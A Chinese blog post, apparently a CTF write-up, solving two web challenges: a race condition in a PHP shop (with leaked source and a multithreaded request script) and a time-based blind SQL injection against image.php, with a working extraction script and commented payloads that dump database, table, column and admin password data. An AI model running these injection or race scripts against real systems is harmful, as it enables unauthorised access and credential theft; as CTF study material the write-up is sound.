zoukankan      html  css  js  c++  java
  • web中的条件竞争漏洞

    simple_shop

    web中的条件竞争漏洞:

    线程编程中,为了保证数据操作的一致性,操作系统引入了锁机制,用于保证临界区代码的安全。通过锁机制,能够保证在多核多线程环境中,在某一个时间点上,只能有一个线程进入临界区代码,从而保证临界区中操作数据的一致性。

    临界区指的是一个访问共用资源(例如:共用设备或是共用存储器)的程序片段,而这些共用资源又无法同时被多个线程访问的特性。

    竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。

    御剑扫一下发现备份源码,关键部分如下:

    if ($_POST['money']){
    
        $money = intval($_POST['money']);
        if($money<0)
        {
        	echo "<script>alert('我们极光虽然有钱...但兄弟姐妹你这样我们会破产的...')</script>";
        	exit();
        }
        if($money <= $rest) {
    
            $sql = "UPDATE account SET rest=rest-".$money;
    
            $db->query($sql);
    
            $sql = "UPDATE account SET own=own+".$money;
    
            $db->query($sql);
    
            echo "<script>alert('支付成功');window.location.href=this.location.href</script>";
    
        } else {
    
            echo "<script>alert('支付失败,可能是因为您的余额不足。')</script>";
    
        }
        $sql="select own from account";
        $banner = intval($db->query($sql)->fetch_assoc()['own']);
       	if($own>=21)
       	{
       		echo "等等..竟然!无中生友,你怕不是黑黑黑...
    ACTF{************}";
       	}
    }
    

    多线程脚本:

    import requests
    import threading
    import queue
    
    url = "http://47.112.16.34:22255/index.php"
    threads = 20
    q = queue.Queue()
    
    for i in range(50):
        q.put(i)
    
    def post():
        while not q.empty():
            q.get()
            r = requests.post(url, data={'money': 1})
            print(r.text)
    
    if __name__ == '__main__':
        for i in range(threads):
            t = threading.Thread(target=post)
            t.start()
    
        for i in range(threads):
            t.join() 
    

    Easy web

    御剑扫一下出来个robot.txt和image.php

    1571726250714

    不允许爬虫访问*.php.bak,试试image.php.bak,发现备份下载

    $id=str_replace(array("\0","%00","\'","'"),"",$id);
    $path=str_replace(array("\0","%00","\'","'"),"",$path);
    

    试了试没有错误回显,猜是时间盲注,嫖了斌斌的脚本:

    # insert into member(`username`,pw,sex,phonenum,email,address) values('wangwu',md5('a'),'a','aa','a','a')
    import requests
    import time
    
    url = "http://47.106.94.13:40005/image.php?"
    #params = "id=\0&path= or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))={}),sleep(5),1)--+"
    params = "id=\0&path= or if((ascii(mid((select password from users where username=0x61646d696e),{},1))={}),sleep(5),1)--+"
    
    string = "1234567890abcdefghijklmnopqrstuvwxyz -ABCDEFGHIJKLMNOPQRSTUVWXYZ:_@,{}."
    
    while True:
        
        #payload = "if((ascii(mid((select group_concat(database()) ),{},1))={}),sleep(4),1))#"
        #payload = "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}),sleep(4),1)"
        #payload = "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='Look_here'),{},1))={}),sleep(4),1)"
        #payload = "if((ascii(mid((select * from Look_here limit 1),{},1))={}),sleep(4),1)"
        get = ""
        for i in range(1,100):
            for j in string:
                parm = params.format(str(i),str(ord(j)))
                url2 = url + parm 
                try:
                    response = requests.get(url2,timeout=3)
                    
                    
                except:
                    get+=j
                    print(get)
                    time.sleep(1)
                    break
            #print(url2)
    
    

    出来密码596c3f5fcccfdfef231c,登录成功,后面暂时还没搞出来,先占个坑叭(›´ω`‹ )

  • 相关阅读:
    android 自定义日历控件
    android 常用类
    真假空格风波
    设计模式的初衷---“委托”有感
    pymysql.err.InterfaceError: (0, '')
    微信文章收藏到有道云笔记PC版只保留了标题
    SQL Server数据库字典生成SQL
    nhibernate常见错误
    NUnit
    使用ffmpeg截取视频
  • 原文地址:https://www.cnblogs.com/localhost-ha/p/11735881.html
Copyright © 2011-2022 走看看